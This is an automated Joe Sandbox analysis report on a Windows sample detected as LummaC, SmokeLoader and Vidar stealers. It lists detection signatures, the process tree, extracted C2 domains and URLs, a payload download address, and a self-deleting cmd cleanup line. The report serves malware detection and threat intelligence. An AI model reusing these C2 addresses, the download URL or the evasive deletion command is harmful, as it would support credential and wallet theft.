Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xvJv1BpknZ.exe

Overview

General Information

Sample name:xvJv1BpknZ.exe
renamed because original name is a hash value
Original sample name:c5261e67bd6d58771e27d7214e8f1c8f.exe
Analysis ID:1448044
MD5:c5261e67bd6d58771e27d7214e8f1c8f
SHA1:6fd857b3ebdb3888785d41f20277bc4e045bf704
SHA256:09d1eba82060a4ff75575b471d563a5e02485e0aaa3afe743802a50d6e987410
Tags:32exe
Infos:

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xvJv1BpknZ.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\xvJv1BpknZ.exe" MD5: C5261E67BD6D58771E27D7214E8F1C8F)
    • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 5876.exe (PID: 7992 cmdline: C:\Users\user\AppData\Local\Temp\5876.exe MD5: EA9DD1EAE2E521666D3F06382104EC10)
        • WerFault.exe (PID: 768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • EE6.exe (PID: 1640 cmdline: C:\Users\user\AppData\Local\Temp\EE6.exe MD5: 2095273C7B526065D7094738AA070E1B)
        • katDDA4.tmp (PID: 7360 cmdline: C:\Users\user\AppData\Local\Temp\katDDA4.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)
          • cmd.exe (PID: 4676 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 3848 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • etrtabd (PID: 7856 cmdline: C:\Users\user\AppData\Roaming\etrtabd MD5: C5261E67BD6D58771E27D7214E8F1C8F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
          00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
            • 0x664:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
            00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              Click to see the 28 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.EE6.exe.4470000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                11.2.EE6.exe.4470000.1.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x201f0:$s1: JohnDoe
                • 0x201e8:$s2: HAL9TH
                11.2.EE6.exe.4247719.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  11.2.EE6.exe.4247719.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                  • 0x201f0:$s1: JohnDoe
                  • 0x201e8:$s2: HAL9TH
                  11.2.EE6.exe.44b0000.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    Click to see the 7 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\etrtabd, CommandLine: C:\Users\user\AppData\Roaming\etrtabd, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\etrtabd, NewProcessName: C:\Users\user\AppData\Roaming\etrtabd, OriginalFileName: C:\Users\user\AppData\Roaming\etrtabd, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\etrtabd, ProcessId: 7856, ProcessName: etrtabd

                    Snort Signatures

                    Timestamp:05/27/24-15:24:02.901341
                    SID:2039103
                    Source Port:53079
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:26:24.246699
                    SID:2039103
                    Source Port:53126
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:27:00.582448
                    SID:2039103
                    Source Port:53132
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:25:27.096781
                    SID:2039103
                    Source Port:53116
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:38.823921
                    SID:2039103
                    Source Port:53070
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:31.525949
                    SID:2039103
                    Source Port:49712
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:25:44.351947
                    SID:2039103
                    Source Port:53119
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:40.496460
                    SID:2039103
                    Source Port:53073
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:26:42.784525
                    SID:2039103
                    Source Port:53129
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:24:08.932496
                    SID:2039103
                    Source Port:53084
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:30.215169
                    SID:2039103
                    Source Port:49711
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:26:13.597836
                    SID:2039103
                    Source Port:53124
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:25:56.339916
                    SID:2039103
                    Source Port:53121
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:26.259477
                    SID:2039103
                    Source Port:49708
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:25:32.321607
                    SID:2039103
                    Source Port:53117
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:36.361209
                    SID:2052787
                    Source Port:51397
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:37.979178
                    SID:2039103
                    Source Port:53069
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:26:32.065397
                    SID:2039103
                    Source Port:53127
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:26:05.875359
                    SID:2039103
                    Source Port:53123
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:25:49.165527
                    SID:2039103
                    Source Port:53120
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:28.922755
                    SID:2039103
                    Source Port:49710
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:24:07.131322
                    SID:2039103
                    Source Port:53083
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:39.639948
                    SID:2039103
                    Source Port:53072
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:26:50.105825
                    SID:2039103
                    Source Port:53130
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:26:19.087513
                    SID:2039103
                    Source Port:53125
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:26:55.402930
                    SID:2039103
                    Source Port:53131
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:25:21.588725
                    SID:2039103
                    Source Port:53115
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:33.065019
                    SID:2039103
                    Source Port:53061
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:25:39.368553
                    SID:2039103
                    Source Port:53118
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:26:00.859899
                    SID:2039103
                    Source Port:53122
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:26:37.380508
                    SID:2039103
                    Source Port:53128
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:24:03.722157
                    SID:2039103
                    Source Port:53080
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-15:23:27.616899
                    SID:2039103
                    Source Port:49709
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: whispedwoodmoodsksl.shopAvira URL Cloud: Label: malware
                    Source: http://guteyr.cc/tmp/index.phpAvira URL Cloud: Label: malware
                    Source: https://whispedwoodmoodsksl.shop/DAvira URL Cloud: Label: malware
                    Source: https://whispedwoodmoodsksl.shop/HAvira URL Cloud: Label: malware
                    Source: http://45.129.96.86/file/update.exeAvira URL Cloud: Label: malware
                    Source: https://whispedwoodmoodsksl.shop/nAvira URL Cloud: Label: malware
                    Source: holicisticscrarws.shopAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeAvira: detection malicious, Label: TR/AVI.AceCrypter.javlp
                    Found malware configuration
                    Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
                    Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
                    Source: 7.3.5876.exe.2170000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
                    Multi AV Scanner detection for domain / URL
                    Source: whispedwoodmoodsksl.shopVirustotal: Detection: 17%Perma Link
                    Source: dbfhns.inVirustotal: Detection: 5%Perma Link
                    Source: http://guteyr.cc/tmp/index.phpVirustotal: Detection: 15%Perma Link
                    Source: whispedwoodmoodsksl.shopVirustotal: Detection: 17%Perma Link
                    Source: http://45.129.96.86/file/update.exeVirustotal: Detection: 20%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeReversingLabs: Detection: 91%
                    Source: C:\Users\user\AppData\Roaming\etrtabdReversingLabs: Detection: 28%
                    Multi AV Scanner detection for submitted file
                    Source: xvJv1BpknZ.exeVirustotal: Detection: 34%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\etrtabdJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: xvJv1BpknZ.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: boredimperissvieos.shop
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: holicisticscrarws.shop
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: sweetsquarediaslw.shop
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: plaintediousidowsko.shop
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: miniaturefinerninewjs.shop
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: zippyfinickysofwps.shop
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: obsceneclassyjuwks.shop
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: acceptabledcooeprs.shop
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: whispedwoodmoodsksl.shop
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: TeslaBrowser/5.5
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: - Screen Resoluton:
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: - Physical Installed Memory:
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: Workgroup: -
                    Source: 7.3.5876.exe.2170000.0.raw.unpackString decryptor: swg5EG--
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0041537E CryptUnprotectData,7_2_0041537E
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D11A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,12_2_6D11A9A0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1625B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,12_2_6D1625B0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0E4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,12_2_6D0E4420
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D114440 PK11_PrivDecrypt,12_2_6D114440
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1144C0 PK11_PubEncrypt,12_2_6D1144C0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,12_2_6D13A730
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D11A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,12_2_6D11A650
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0F8670 PK11_ExportEncryptedPrivKeyInfo,12_2_6D0F8670
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0FE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,12_2_6D0FE6E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D140180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,12_2_6D140180
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1143B0 PK11_PubEncryptPKCS1,PR_SetError,12_2_6D1143B0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,12_2_6D13BD30
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0F7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,12_2_6D0F7D60
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D137C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,12_2_6D137C00
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D113FF0 PK11_PrivDecryptPKCS1,12_2_6D113FF0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D139EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,12_2_6D139EC0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D113850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,12_2_6D113850
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D119840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,12_2_6D119840
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13DA40 SEC_PKCS7ContentIsEncrypted,12_2_6D13DA40
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D113560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,12_2_6D113560

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeUnpacked PE file: 7.2.5876.exe.400000.0.unpack
                    Source: xvJv1BpknZ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53071 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53074 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53076 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53077 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53082 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53086 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 37.27.34.12:443 -> 192.168.2.8:53087 version: TLS 1.2
                    Source: Binary string: mozglue.pdbP source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
                    Source: Binary string: freebl3.pdb source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
                    Source: Binary string: freebl3.pdbp source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
                    Source: Binary string: nss3.pdb@ source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.12.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.12.dr, vcruntime140.dll.12.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.12.dr, msvcp140[1].dll.12.dr
